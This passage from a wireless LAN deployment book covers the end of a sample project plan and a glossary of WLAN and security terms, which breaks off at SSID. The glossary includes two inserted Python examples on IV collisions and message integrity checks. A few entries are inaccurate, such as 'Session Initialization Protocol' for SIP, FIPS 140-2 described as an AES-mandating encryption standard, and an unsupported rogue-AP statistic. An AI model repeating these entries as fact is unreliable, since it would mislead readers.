After the project "go/no go" milestone is achieved, a pilot site is identified. A pilot site kickoff meeting is
held and a pilot design guide is created, based upon the initial technical design created (as detailed in
the Design section earlier). Pilot site documentation and user communication collateral is created.
The pilot installation follows, with floor plans imported into the management and planning tool, the
location of APs defined, the WLAN controllers and access points installed, and the pilot site finalized for
use. Users are notified, and the pilot commences. For the purposes of this plan, it is assumed that the
pilot lasts approximately 10 weeks.
User feedback is collected, documented, and analyzed, and the technical design is updated to reflect the
pilot findings.

Communications
The Communications track does not lie on the critical path and as such can commence early on in the
project lifecycle. A communications team is defined and an internal solutions program website is created.
Project and site communication packs are created. User guides, FAQs (Frequently Asked Questions), and
helpdesk scripts are also developed by the design team, in partnership with any dedicated HR
communications staff available.

Note
Some large-scale deployments utilize external vendors to help manage client communication
and training. This is more common in very large or multinational deployments.

Support
The Support section deals with the activities relating to solutions, technical support, and maintenance. A
week is set aside to define the Service Level Agreement (SLA), and the support plan is documented.
Training material for the technical support helpdesk team is produced in conjunction with the design
team, along with more detailed second and third line troubleshooting and training collateral.

Deployment
The Deployment section details the tasks associated with the installation of the solutions infrastructure.
It is assumed that each of the five sites will be deployed consecutively, with Example Ltd using many of
the same centralized IT staff for each deployment.
The deployment only commences once the final technical design guide is complete, including updates

from the test plan and pilot.


The deployment itself follows closely that which was undertaken for the pilot. Floor plans are imported
into the management and planning tool, AP locations are defined, WLAN controllers and the access
points are installed, and three weeks are spent on client communication and training. WLAN client
adaptors are distributed to end users who are not provisioned with wireless-ready laptops, that is, laptops
that already have wireless cards embedded.
The site is then launched into production. By staggering the launch of each site, high support overhead
is avoided, and the IT support staff are free to deal with end users on a site-by-site basis.

Post Project Activities


After the last site is complete, the post project activities are undertaken. A week is spent analyzing end-user satisfaction and feedback. A Post Project Review document is created that incorporates an initial
return on investment (ROI) and "lessons learned" section. Finally, this document is presented to the
project steering committee, and the project is formally completed.

Summary
This basic project plan gives you an overview of the planning and progress of a relatively small project.
You can see the impact of lab testing and pilots on the final design and deployment. It is also clear how
several activities, such as client communication and support planning, are not on the critical path and
can be undertaken contemporaneously with other activities.

Glossary
This glossary will help you to understand some of the more common WLAN-related marketing, technical,
security, and industry terms used throughout this book and in related publications and discussions.
These definitions should not be considered canonical and are provided as a quick reference only. Finally,
this list should not be considered comprehensive because many obscure terms have been omitted, and
new words and phrases are often introduced as the industry grows.

Numbers
3DES
A variant of the Data Encryption Standard (DES) that applies the DES algorithm three times to each
block (encrypt, decrypt, encrypt) with two or three independent 56-bit keys, for a 112- or 168-bit key.
Using one key three times would collapse to ordinary DES, so that is never done in practice. Also known
as "Triple DES."

802.1x
An IEEE standard for port-based network access control. Limits access to the medium (wired or
wireless) until the client has been authenticated. Several authentication methods are supported via
the Extensible Authentication Protocol (EAP). There are three constructs within an 802.1x system:
the supplicant (or client device), the authenticator (the access point or switch), and the
authentication server (the server that authenticates the session).

802.11a
An IEEE WLAN standard that defines transmission in the 5-GHz range and provides up to 54-Mbps
bandwidth, although actual throughput will always be lower than this. 802.11a uses Orthogonal
Frequency Division Multiplexing (OFDM), which helps provide greater bandwidth. 802.11a is not
approved for use in many European countries without additional frequency and power restrictions
(as defined by the supplementary 802.11h standard).

802.11b
An IEEE standard that defines transmission in the 2.4-GHz range and provides up to 11-Mbps
bandwidth; actual throughput will always be lower than this. 802.11b is the most widely deployed
WLAN standard today. It is being replaced by 802.11g, which is backward compatible with
802.11b equipment but can provide greater bandwidth.

802.11c
An IEEE standard, focusing on the MAC layer, that deals with wireless bridging.

802.11d
An IEEE standard that supplements the physical layer requirements (defined in other 802.11
standards), extending the operation of 802.11 WLANs to new regulatory domains (countries). Also

known as "worldmode" because it ensures that compliant equipment can work in different
countries, not just the United States.

802.11e
An IEEE standard that defines enhancements to the Media Access Control layer to provide quality
of service (QoS). QoS is very important for wireless voice and video, but it can also be used to
prioritize sensitive traffic.

802.11f
An IEEE standard for Inter Access Point Protocol (IAPP), a specification to promote multivendor
access point interoperability. 802.11f is used to support fast client roaming.

802.11g
An IEEE standard that defines transmission in the 2.4-GHz range and provides up to 54-Mbps
bandwidth; actual throughput will always be lower than this. The increase in bandwidth over
802.11b (which uses the same frequency range) is achieved by using OFDM (Orthogonal
Frequency Division Multiplexing). OFDM allows for more efficient data encoding, which therefore
increases available bandwidth. 802.11g is a relatively new standard that is also backward
compatible with 802.11b; this feature has dramatically increased its adoption rate within the
industry.

802.11h
An IEEE standard that defines two additions to the MAC and PHY layers of 802.11a, allowing the 5-GHz
standard to be used in Europe. The enhancements are Dynamic Frequency Selection (DFS)
and Transmission Power Control. Both provide more control over the 5-GHz signal, as required by
European regulations (CEPT Recommendation ERC 99/23).

802.11i
An IEEE standard that provides for greatly enhanced security. 802.11i replaces the older Wired Equivalent
Privacy (WEP) with CCMP, based on the Advanced Encryption Standard (AES), as its mandatory cipher, and
defines Temporal Key Integrity Protocol (TKIP) as an interim RC4-based cipher for legacy WEP hardware,
adding per-packet key mixing, a message integrity check (Michael), and a replay counter. Together with
802.1x/EAP authentication and a four-way key handshake, these provide mutual authentication, fresh
per-session keys, protection against replay attacks, and genuine data integrity checks.

802.11j

An IEEE standard that specifies extensions for the Japanese market and regulatory requirements.

802.11k
A proposed IEEE standard for radio resource management. 802.11k will improve roaming
decisions by sharing information between the access point and the client.

802.11l
There is no 802.11l standard. It was deliberately skipped because the letter L was deemed
typographically unsound; it could easily be misread.

802.11m
An IEEE specification that deals with maintenance and administrative issues concerning the other
802.11 standards. It is often referred to as "802.11 housekeeping."

802.11n
A proposed IEEE standard for high-throughput WLANs (with theoretical speeds of over 500 Mbps,
although speeds in the range of 100 to 200 Mbps are more likely). 802.11n will provide these
much greater speeds through a combination of MIMO (multiple-input multiple-output) and OFDM.
MIMO uses multiple transmitter and receiver antennas to provide increased data throughput.

802.11o
A proposed IEEE standard for fast re-authentication. This feature will assist wireless voice services
especially, because fast re-authentication improves voice quality when moving from access point
to access point while using a WiFi phone.

802.11p
A proposed IEEE standard for using wireless in moving vehicles. 802.11p is also known as WAVE
(Wireless Access for the Vehicular Environment) and is planned to interoperate with the DSRC
(Dedicated Short Range Communications) industry forum.

802.11q
A proposed IEEE standard for wireless VLAN management. This proposal would allow for
standards-based support for multiple VLANs per access point.

802.11r
A proposed IEEE standard for fast roaming. Like fast re-authentication (addressed in the 802.11o
proposal), fast roaming is especially important for wireless voice applications and services.

802.11s
A proposed IEEE standard for mesh wireless networks. Mesh wireless networks are made up of
many access points that communicate with each other via "wireless self-configuring multi-hop
topologies." Put simply, this means that the access points not only provide wireless connectivity to
client devices, but also communicate with each other via RF, thereby avoiding the need to cable
every access point. Mesh wireless networks are typically deployed in outdoor environments, where
coverage is required in large areas and it may be difficult or costly to cable every device.

802.11t
A proposed IEEE standard for producing wireless performance metrics. This will be useful in
promoting standardized reporting, trending analysis and statistics, and so on. This effort is also
known as WPP (Wireless Performance Prediction).

802.11u
A proposed IEEE standard for interoperability between WLANs and other non-WiFi networks, such
as cellular networks. This is also known as WIEN (Wireless Internetworking with External
Networks).

802.11v
A proposed IEEE standard for wireless network management, including client device management.
This would allow, for example, the access points to configure and manage certain aspects of client
behavior.

802.11w
A proposed IEEE standard for introducing "management frame protection." Management frames
are transmissions that include important management information and are currently vulnerable to
malicious interference. This standard would protect these frames, avoiding interference or attacks
that could potentially cause network disruption.

802.11x
There is no 802.11x standard directly, as the letter X is sometimes used to denote a generic value.
As such, 802.11x is sometimes used to refer to the entire range of 802.11 standards. Do not
confuse this with 802.1X, a separate IEEE standard for port-based network access control. 802.1X
is the basis for most enterprise class wireless network security.

802.11y
A proposed IEEE standard to introduce a predictable and "fair" method to share frequency bands
or channels in WLANs. This effort is also known as CBP (Contention Based Protocol).

802.11z
There is currently no 802.11z standard.

802.15
The IEEE working group for 2.4-GHz personal-area networks (PAN). Its best-known standard, 802.15.1,
is derived from Bluetooth; the same group also produced 802.15.4, the basis of ZigBee. See also Bluetooth.

802.16
The IEEE standard on broadband wireless wide-area networks (WANs). The original 802.16 works in the
10- to 66-GHz frequency range.

A
AAA
Authentication, authorization, accounting. This term is used to describe a generic system or
solution that ensures that only authenticated users or devices gain access to the network in a
recorded and auditable manner. This framework is usually provided by a AAA server speaking RADIUS
(or TACACS+), such as Cisco Access Control Server or Microsoft IAS, which typically validates
credentials against a directory such as Microsoft Active Directory. The user or device must supply a
set of credentials, which the AAA server validates before approving access to the network and
recording the transaction. Some AAA services also monitor and record user activity and what services
are accessed.

access layer switch
Access layer switches are the wired devices that provide connectivity to your wired network.
Access points are usually connected to access layer switches. Also known as network edge
switches.

access point
See AP.

ACL
Access control list. A managed list that defines network traffic controls by protocol, port, address,
or time. The ACL defines the traffic that is permitted and the traffic that is denied.

ad-hoc network
In WLAN terms, an ad-hoc network is one in which two or more WLAN clients communicate with
each other directly, without the use of an access point (AP). Ad-hoc networks are usually used by
small, home, or SOHO networks on a peer-to-peer basis without a central communication hub.

AES
Advanced Encryption Standard, a symmetric block cipher (Rijndael) with a 128-bit block and 128-,
192-, or 256-bit keys, specified in Federal Information Processing Standards (FIPS) Publication 197
for protecting sensitive information. In 802.11i it is used in CCM mode (CCMP) to replace the RC4-based
WEP and TKIP, providing both confidentiality and integrity; AES-CCMP is the mandatory cipher for WPA2.
See also 802.11i; CCMP.

amplitude
The strength of a radio signal.

AP
Usually a hardware device that acts as a communication hub for wireless clients, linking 802.11
stations to a wired backbone network. Each access point effectively creates a radio cell through
which all traffic must pass. Access points are often abbreviated to AP in industry literature.

association
The relationship established between wireless clients and access points. Association denotes a MAC
layer connection between the client and the AP.

attenuation
The loss of signal strength when radiated due to environmental factors, such as walls, furniture,
building material, and so on. Attenuation is also caused by long lengths of transmission cable.

authentication server
Another term for a AAA server. See also AAA.

authenticator
A device that authenticates a client. In EAP-based wireless networks, the access point usually acts
as an authenticator by passing the request upstream to a AAA server for validation. Upon
successful validation of the user's or device's credentials, the authenticator permits it access to the
network.

B
band
A set of adjacent frequencies lying within a definite range.

Bluetooth
A short-range wireless cable replacement technology. Bluetooth is the brandname for the IEEE
802.15 personal-area network standard. Bluetooth also uses the 2.4-GHz frequency range.

BSS
Basic Service Set. A MAC layer grouping of wireless devices that communicate with each other. A
BSS is a single radio cell formed by a single base station or access point.

C
CA
Certificate authority. Network software that issues and manages security credentials and public
keys for authentication and message encryption. As part of a public key infrastructure (PKI), which
enables secure exchanges of information over a network, a certificate authority checks with a
registration authority (RA) to verify information provided by the requestor of a digital certificate. If
the registration authority verifies the requestor's information, the certificate authority can issue a
certificate. Based on the PKI implementation, the certificate content can include the certificate's
expiration date, the owner's public key, the owner's name, and other information about the public
key owner. See also RA.

CCMP
Counter Mode with CBC-MAC Protocol. CCMP is the AES-based encryption protocol defined in 802.11i. It
runs AES in CCM mode: counter mode for confidentiality and a cipher block chaining message
authentication code (CBC-MAC) for integrity, so every frame is both encrypted and authenticated with
one 128-bit key. It replaces WEP's RC4 stream cipher and linear CRC-32 integrity value.

certificate
A digitally signed document that binds a public key to the identity of a device or user, issued by a
certificate authority (CA). Certificates do not generate keys; the holder generates the key pair, and
the certificate lets other parties in a PKI (public key infrastructure) verify which public key belongs
to whom.

certificate authority
See CA.

channel
A frequency band in which a specific broadcast signal is transmitted.

CHAP
Challenge Handshake Authentication Protocol. An authentication scheme that uses a three-way
handshake (challenge, response, verify) to authenticate the identity of the peer. CHAP is defined in
RFC 1994 (which replaced the original definition in RFC 1334). The server sends a random challenge;
the client returns an MD5 hash of the message identifier, its secret, and the challenge; the server
computes the same value and compares. The secret never crosses the link, but an eavesdropper who
captures the challenge and response can test password guesses offline.

CLI
Command-line interface. A nongraphical, text-based method of managing a network device, such as an
access point. Cisco IOS is an example of a CLI-based solution. Many devices with a CLI also offer a
graphical user interface (GUI) for the same functions. Also known as "command line" and
"command prompt."

client
In a WLAN, a client is any device with a radio interface that does not act as a pass-through or
relay.

collision
The result of two or more stations attempting to transmit a packet across the network at the same
time, when the network uses a shared medium. Because wireless networks use a shared medium
or single segment per access point, collisions can occur quite regularly. WLANs use a technique
called CSMA/CA to reduce such collisions because they can result in packet loss and can
negatively impact the performance of the network.

command-line interface
See CLI.

CRC
Cyclic redundancy check. A simple method of detecting accidental transmission errors in a message.
A CRC is a linear function, not a cryptographic hash, so it offers no protection against deliberate
modification; WEP's use of CRC-32 as its integrity check value is one of its design flaws.

CRL
Certificate Revocation List. A list of certificates that have been revoked by the certificate authority
(CA). A CRL is analogous to a "blacklist" of certificates that are no longer permitted or accepted.

cryptography
The ISO defines cryptography as "[the] discipline which embodies principles, means, and methods
for the transformation of data in order to hide its information content, prevent its undetected
modification, and/or prevent its unauthorized use." [ISO 7498-2: 1989]

CSMA/CA
Carrier sense multiple access with collision avoidance. The mechanism used by WLANs to reduce
packet collisions within cells. A station listens before transmitting and waits a random back-off when
the channel is busy. Because a radio cannot detect a collision while it is transmitting, a missing
acknowledgment is treated as a collision, and the station retransmits after a random back-off drawn
from an exponentially growing contention window.

D
dBi
Decibels isotropic. A relative gain measurement with respect to an isotropic radiator in free space
(uniform emitter in free space, a theoretical situation). It usually describes gain for antennas
operating at 1 GHz or above.

dBm
Decibels referenced to 1 milliwatt (mW). dBm is an absolute measure of power in communications:
0 dBm is 1 mW, 20 dBm is 100 mW, and -70 dBm (a typical received signal) is 100 pW.

decibels
A measurement method used to simplify the expression and calculation of wireless power levels. It
is also the unit used for measuring antenna gain. Decibels are abbreviated as dB, and you may
also see dBm and dBi.

demilitarized zone
See DMZ.

DES
Data Encryption Standard. DES is a long-established symmetric block cipher with a 56-bit key,
originally published by the U.S. National Bureau of Standards (now the National Institute of
Standards and Technology) as FIPS 46 in 1977 and standardized by ANSI in 1981 as ANSI X3.92. Its
key is short enough to be found by brute force with modern hardware, and NIST withdrew single DES
in 2005 in favor of 3DES and AES.

DHCP
Dynamic Host Configuration Protocol. A standard network protocol that dynamically assigns IP
addresses, and other settings, to clients, usually from a centralized DHCP server.

Direct-Sequence Spread-Spectrum
See DSSS.

DMZ
Demilitarized zone. Takes its name from the neutral ground between two opposing parties. A DMZ
separates trusted and untrusted networks.

DNS
Domain Name System. The method by which Internet domain names are validated and translated
into IP addresses. The scheme uses a distributed set of DNS servers. Enterprises can also create
and operate their own DNS servers within their own networks.

DSSS
Direct-Sequence Spread-Spectrum. DSSS spreads each data bit across a much wider frequency band by
combining it with a higher-rate pseudo-random "chipping" sequence; the receiver applies the same
sequence to recover the data. This technique increases the signal's resistance to narrowband
interference. DSSS is one of two types of spread-spectrum radio technology used in WLAN
transmissions (802.11b uses it), the other being FHSS.

Dynamic Host Configuration Protocol
See DHCP.

E
EAP
Extensible Authentication Protocol. EAP is a general protocol for authentication that also supports
multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates,
public key authentication, and smart cards.

EAPoL
EAP over LAN. A message structure for sending EAP packets in an 802.1x framework.

EAP-FAST
Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling. An EAP
mechanism proposed by Cisco Systems that authenticates inside a TLS-protected tunnel established
with a Protected Access Credential (PAC), a pre-shared secret provisioned to the client. Unlike PEAP
or EAP-TLS, EAP-FAST does not require certificates on clients or servers.

EAP-TLS
Extensible Authentication Protocol with Transport Layer Security. EAP-TLS is one of the many EAP
mechanisms for 802.1x-based authentication. It uses certificates on both sides to provide mutual
authentication between the client device (supplicant) and the AAA server; the authenticator only relays
the exchange. Because every client needs its own certificate, it is the strongest but most operationally
demanding of the common EAP types.

EAP-TTLS
Extensible Authentication Protocol with Tunneled Transport Layer Security. EAP-TTLS is an EAP
mechanism developed by Funk Software, Inc., (prior to their acquisition by Juniper Networks) and
Certicom for 802.1x authentication and published as an IETF draft. The server presents a certificate to
establish a TLS tunnel, and the client then authenticates inside that tunnel with a password-based
method such as PAP, CHAP, or MS-CHAPv2; only the server needs a certificate.

encryption
Encryption is the process of changing data into a form that can be read, or decrypted, only by the
intended receiver. Encryption uses a "key" to scramble the data. The key can be distributed via a
public key infrastructure (PKI) system, or both ends of the transmission can use pre-shared keys.

ESS
Extended Service Set. Multiple basic service sets (BSS) linked by a backbone network to form a
single subnetwork.

ETSI
European Telecommunications Standards Institute. The primary telecommunication standards
organization in Europe.

EWC
Enhanced Wireless Consortium. An industry consortium of leading wireless industry members
formed to accelerate the ratification and adoption of the upcoming 802.11n standard and to
ensure interoperability between member-developed products.

F
Faraday Cage
An electrical apparatus designed to prevent the passage of electromagnetic waves, either
containing them in or excluding them from its interior space. It is named for physicist Michael
Faraday, who built the first one in 1836. Also known as a "screen room" or "FCC cage."

fast handoff
See fast roaming.

fast roaming
A generic term used in the WLAN industry to denote various proprietary mechanisms to decrease
the amount of time taken for clients to roam from wireless cell to cell. Fast roaming is especially
important for wireless voice services because even very minor delays or service interruptions,
often overlooked in data applications, can have an adverse effect on voice traffic.

FCC
Federal Communications Commission. The U.S. regulatory body for telecommunications, including
wireless LANs.

Federal Information Processing Standard (FIPS) 140-2
FIPS 140 is the current, highly secure encryption standard required by the U.S. federal
government for use within government agencies. FIPS 140 mandates the use of the Advanced
Encryption Standard (AES), implemented in 802.11i (the newest wireless security standard), for
use with government data.

FHSS
Frequency-Hopping Spread-Spectrum. One of two types of spread-spectrum radio technology
used in WLAN transmissions. FHSS modulates the data by hopping from frequency to frequency in
the same band in a predetermined manner.

G
greenfield deployment
A deployment in an environment where no network has previously been in place. Named
greenfield in reference to the fact that most "new" buildings and solutions were supposed to have
been built in green fields.

H
hash
A one-way algorithm whose output makes it very difficult, if not impossible, to derive the original
input. Hashing is an encryption technique that is used to generate WEP keys and TKIP rehashed
keys. Hashes are also used to validate message integrity and to establish the identity of a sender.

HiperLAN
High-performance radio local-area network. A competing technology to 802.11a, which works in
the same 5-GHz ISM band. Developed in Europe by the European Telecommunications Standards
Institute (ETSI), HiperLAN has not seen widespread use.

hotspot
A publicly accessible WLAN network. Wireless hotspots are often provided free, either as public
amenities or for a small fee in cafes, coffee shops, malls, and so on. With the increasing popularity
of WLANs and wireless devices, the number of public hotspots is also rising rapidly.

I
IAPP
InterAP Protocol. A protocol being developed to support interoperability, mobility, handover, and
coordination among APs in a WLAN. IAPP enables APs to communicate with one another.

IEEE
Institute of Electrical and Electronic Engineers. An international organization of professionals
whose activities include the development of communication and network standards. IEEE LAN
standards are the predominant LAN standards today; this includes the wireless LAN standards.

IETF
The Internet Engineering Task Force (IETF) is an international organization dedicated to the
development of the Internet through technical recommendations and specifications. It is not
responsible for the establishment of standards, but it is the principal body for the development of
specifications, many of which are later adopted as standards.

infrastructure network
Refers to an 802.11 framework in which communication takes place via an access point. In
infrastructure mode, wireless devices use the AP to communicate with each other and with devices
on a wired network. Most corporate WLANs operate in infrastructure mode to access the wired
LAN.

initialization vector
See IV.

Institute of Electrical and Electronic Engineers
See IEEE.

interference
In wireless terms, the RF effects that occur when other signals, usually in the same frequency
range, inhibit or negatively affect the reception of the originally desired signal.

Internet Engineering Task Force
See IETF.

IPsec
IP Security. IPsec is a security protocol defined by the Internet Engineering Task Force (IETF) that
provides authentication and encryption over the Internet. IPsec is generally used to create VPNs.

ISO
International Organization for Standardization. An international organization of national standards
bodies from many countries.

IV
Initialization vector. In encryption, random data used to make a message unique. The IV is usually
a block of bits that is used to "scramble" the data you want to encrypt. WEP uses a 24-bit IV
value.
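
The entry above states that WEP uses a 24-bit IV. The following added example (not code from the book) puts a number on why that size is a problem for a stream cipher, where reusing an IV under the same key reuses keystream: it computes the exact birthday-bound probability that a randomly chosen IV repeats after a given number of frames, the frame count at which a repeat becomes likely, and how quickly a transmitter that simply counts IVs upward must wrap around. The IV space of 2**24 comes from the entry; the 1,500 frames per second rate is a constructed figure used only for illustration.

```python
"""Why a 24-bit initialization vector is too small.

Added example, not code from the book. The IV space (2**24) is taken from the
glossary entry; the traffic rate in the demo is a constructed figure.
"""
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 distinct IV values


def collision_probability(n_frames: int, space: int = IV_SPACE) -> float:
    """Exact probability that at least one IV value repeats when n_frames
    frames each pick an IV uniformly at random (the birthday bound).

    The product of (1 - k/space) is accumulated as a sum of log1p terms so
    it does not underflow for large n_frames."""
    if n_frames > space:
        return 1.0  # pigeonhole: more frames than IV values guarantees a repeat
    log_no_repeat = 0.0
    for k in range(n_frames):
        log_no_repeat += math.log1p(-k / space)
    return 1.0 - math.exp(log_no_repeat)


def frames_for_collision_probability(p: float, space: int = IV_SPACE) -> int:
    """Approximate number of random IVs after which a repeat is at least p
    likely, from the standard birthday approximation
    n ~= sqrt(2 * space * ln(1 / (1 - p)))."""
    if not 0.0 < p < 1.0:
        raise ValueError("p must be strictly between 0 and 1")
    return math.ceil(math.sqrt(2.0 * space * math.log(1.0 / (1.0 - p))))


def seconds_until_sequential_wrap(frames_per_second: float,
                                  space: int = IV_SPACE) -> float:
    """A transmitter that assigns IVs by counting upward must reuse one after
    `space` frames; at the given frame rate that takes only this many seconds."""
    if frames_per_second <= 0:
        raise ValueError("frame rate must be positive")
    return space / frames_per_second


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE:,} values")
    print(f"P(repeat) after 1,000 random IVs: {collision_probability(1_000):.3f}")
    print(f"frames for a 50% chance of a repeat: "
          f"{frames_for_collision_probability(0.5):,}")
    # Constructed rate: a busy access point pushing 1,500 frames per second.
    hours = seconds_until_sequential_wrap(1_500) / 3600
    print(f"sequential IVs wrap after about {hours:.1f} hours at 1,500 frames/s")
```

With random IVs a repeat is more likely than not after fewer than 5,000 frames, and a counting transmitter exhausts the space in a few hours at the constructed rate; both figures are why later designs (TKIP, 802.11i) moved to a 48-bit sequence counter and per-packet keys rather than relying on a 24-bit IV.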

K
key
A value that must be fed into the algorithm used to decode an encrypted message to reproduce
the original plain text. Some encryption schemes use the same (secret) key to encrypt and
decrypt a message, but public key encryption uses a "private" (secret) key and a "public" key that
is known by all parties.

key management
The process of managing the creation and distribution of keys in an encryption framework. This
was a major problem with early deployments of static WEP-based wireless LANs because every
access point and client had to have the keys manually configured. Newer EAP mechanisms
introduce key management functionality.

L
LBS
Location-based services. A term used to describe the ability of products to detect and (usually
graphically) display the location of devices on a wireless network. LBS is often used to track
expensive assets by fixing "asset tags" (small battery-operated 802.11-based transmitters). These
devices transmit their location to nearby access points, which in turn send this information to the
location server or management tool. RFID is a form of location-based services.

loss
The reduction of an RF signal due to distance, obstructions, or attenuation.

LWAPP
Lightweight Access Point Protocol. A protocol used to control so-called "lightweight" access points
and to split the management and control functions between the AP and a separate WLAN
controller. This greatly reduces the complexity of configuring and managing WLANs because each
access point does not need to be managed and configured manually; the WLAN controller takes
over this function.

M
MAC address
Media Access Control address. A 6-byte hexadecimal address that a manufacturer assigns to the
Ethernet controller for a port. Effectively, every Ethernet device has a unique MAC address that is
used by higher-layer protocols.

MD5
Message-Digest Algorithm 5. A 128-bit one-way hashing algorithm used in many authentication
algorithms. It is now generally considered unsuitable for strong encryption.

Megahertz
A measure of electromagnetic wave frequency equal to one million (1,000,000) hertz, often
abbreviated as MHz.

MIC
Message Integrity Check. A method to check the integrity of wireless packets to ensure that they
have not been intercepted and modified. Forms part of WPA.
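
The hash and MIC entries above describe the same idea from two sides: a one-way function over a frame that lets the receiver detect modification. The following added example (not code from the book, and not WPA's actual TKIP Michael algorithm) shows the mechanism with a keyed hash, HMAC-SHA256 truncated to a 64-bit tag, over a toy frame whose addresses, payload and key are all constructed for illustration. It checks that an intact frame verifies and that a changed payload byte, a changed source address, or a different key all fail.

```python
"""Keyed message integrity check (MIC) over a constructed frame.

Added example, not code from the book. HMAC-SHA256 truncated to 64 bits stands
in for the keyed one-way function; the frame layout, addresses and key are
constructed for illustration and are not WPA's TKIP (Michael) MIC.
"""
import hashlib
import hmac

TAG_LEN = 8  # bytes: a 64-bit tag
MIC_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed demo key


def build_frame(src: bytes, dst: bytes, payload: bytes) -> bytes:
    """Toy frame: 6-byte source MAC, 6-byte destination MAC, 2-byte length, payload."""
    if len(src) != 6 or len(dst) != 6:
        raise ValueError("MAC addresses must be 6 bytes")
    return src + dst + len(payload).to_bytes(2, "big") + payload


def compute_mic(key: bytes, frame: bytes) -> bytes:
    """Keyed integrity tag over the whole frame. Covering the address fields as
    well as the payload means a spoofed source address also fails verification."""
    return hmac.new(key, frame, hashlib.sha256).digest()[:TAG_LEN]


def protect(key: bytes, frame: bytes) -> bytes:
    """Append the MIC to the frame before transmission."""
    return frame + compute_mic(key, frame)


def verify(key: bytes, protected: bytes) -> bool:
    """Recompute the MIC at the receiver and compare it in constant time."""
    if len(protected) <= TAG_LEN:
        return False
    frame, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    return hmac.compare_digest(compute_mic(key, frame), tag)


def flip_bit(data: bytes, index: int) -> bytes:
    """Return a copy of data with the low bit of byte `index` inverted."""
    out = bytearray(data)
    out[index] ^= 0x01
    return bytes(out)


def demo() -> dict:
    """Exercise the MIC against an intact frame and three kinds of change."""
    src = bytes.fromhex("001122334455")  # constructed addresses
    dst = bytes.fromhex("66778899aabb")
    frame = build_frame(src, dst, b"temperature=21.5;valve=open")
    sent = protect(MIC_KEY, frame)
    return {
        "intact": verify(MIC_KEY, sent),
        "payload_modified": verify(MIC_KEY, flip_bit(sent, 14)),  # first payload byte
        "source_spoofed": verify(MIC_KEY, flip_bit(sent, 0)),     # first byte of src
        "wrong_key": verify(bytes(16), sent),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:18s} -> {'accepted' if ok else 'rejected'}")
```

The key is what makes this an integrity check rather than a checksum: an unkeyed hash appended to a frame only catches transmission errors, because anyone who alters the frame can recompute the hash, whereas the tag above can only be produced by a party holding the shared key. This is also why the glossary's shared-secret and key-management entries matter for the MIC: the check is only as strong as the secrecy and rotation of the key behind it.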

MS-CHAP
Microsoft Challenge Handshake Authentication Protocol. Microsoft's extension to CHAP. MS-CHAP is
a mutual authentication protocol that also permits a single login in a Microsoft network
environment.

mW
Milliwatt. A unit of power equal to one thousandth of a watt. WLANs measure power in mW.

O
OFDM
Orthogonal Frequency Division Multiplexing. OFDM encodes traffic by splitting and spreading it into
several smaller frequency bands transmitted concurrently. This method provides more effective
bandwidth and is less susceptible to interference. OFDM is used in 802.11a and 802.11g WLAN
specifications to produce higher bandwidth levels.

P
PEAP
Protected Extensible Authentication Protocol. PEAP is an EAP mechanism that authenticates
wireless LAN clients using only server-side digital certificates. An encrypted SSL/TLS tunnel
between the client and the authentication server is created and used to protect the subsequent
user authentication exchange.

PKI
Public key infrastructure. A system or framework where digital certificates, certificate authorities,
and other registration authorities verify and authenticate the validity of each party involved in a
network transaction. PKI uses public and shared keys to encrypt and decrypt data.

Plenum
The interstitial space between the raised floor and lowered ceiling, where most air ducts are
situated.

PoE
Power over Ethernet. A technique used to deliver direct current (DC) power over twisted-pair
cables to Ethernet devices. This approach obviates the need for these devices to be connected
directly to a mains power-supply socket. The IEEE standard for PoE is called 802.3af.

PSK
Pre-shared key. The IEEE 802.11 term for a shared secret, also known as a shared key. Pre-shared
keys form an important part of WPA when used in WPA-PSK mode. This allows a small or SOHO
wireless network to use the enhancements of WPA without using an EAP server. Pre-shared keys
play a fundamental part in many encryption frameworks.

Q
QoS
Quality of service. A networking technology that seeks to measure, improve, and guarantee
transmission rates, error rates, and other performance characteristics based on priorities, policies,
and reservation criteria arranged in advance. Some protocols allow packets or streams to include
QoS requirements.

R
RA
Registration authority. An optional PKI entity that has responsibility for recording or verifying some
or all the information contained in a certificate request. It effectively validates information relating
to the people, or groups of people, who request a certificate.

radio
A generic term used throughout this book to refer to any radio-based interface
(transmitter/receiver) that provides network access via the 2.4-and 5-GHz frequency ranges.

RADIUS
Remote Authentication Dial-In User Service. A client/server-based authentication and accounting
system. RADIUS was originally developed as a AAA framework for dial-up users, but it is now
widely used for broadband and enterprise networking.

RF
Radio frequency. The rate at which the radio waves oscillate. Higher-frequency rates indicate more
rapid oscillations. 802.11b and 802.11g utilize the 2.4-GHz frequency range, whereas 802.11a
utilizes the 5-GHz range.

roaming
A client process that maintains network access when moving between Layer 2 and Layer 3
networks. For example, on a WLAN with multiple access points, a client "roams" when it moves
through the building, associating with different access points as it changes position. This occurs as
the client device associates with the nearest access point (or the one with the greatest signal).
While moving about, the signal strength changes. This in turn triggers an event causing the client
to search for and, if possible, associate with an access point with a higher signal strength.
Effectively, the client has "jumped" from access point to access point. This event is known as
Layer 2 roaming.

rogue AP
Any access point physically connected to, or interfering with, your enterprise network that was not
installed, managed, or approved by your enterprise IT department. Rogue APs are a serious
security threat because they are often misconfigured (or have no security enabled at all), which
effectively provides hackers with an open "back door" into your network. 99 percent of rogue APs
are non-malicious; that is, they are simply installed by your users in good faith but without proper
knowledge of, or familiarity with, your wireless networking policies.

ROI
Return on investment. The amount of time required for a product, system, or service to pay for
itself as a direct result of operating efficiencies or productivity improvements that it provides.

RSN
Robust Security Network. A new concept introduced by 802.11i that requires the use of dynamic
negotiation of authentication and encryption algorithms between access points and mobile devices.
RSN will allow the WLAN to evolve with emerging standards, which can be negotiated between the
clients and infrastructure as they are introduced.

S
Secure Shell protocol (SSH)
A Telnet-like protocol that establishes an encrypted session.

session
The series of communication transactions between a client device and specific station in a wireless
network.

shared secret
A shared secret is a string of text or numbers that is communicated between two parties over an
out-of-band connection. Also known as a shared key or pre-shared key (PSK), a shared secret is
used as input to a one-way hash algorithm.

SIP
Session Initialization Protocol. A signaling protocol that establishes real-time calls and conferences
over IP networks.

spectrum
Electromagnetic radiation arranged in order of wavelength, with certain radio bands reserved for
specific services, for example, police, fire, WLAN, and so on.

SSH
Secure Shell protocol. A Telnet-like protocol that establishes an encrypted session.

SSID
Service set identifier. The unique name shared among all computers and other devices in a
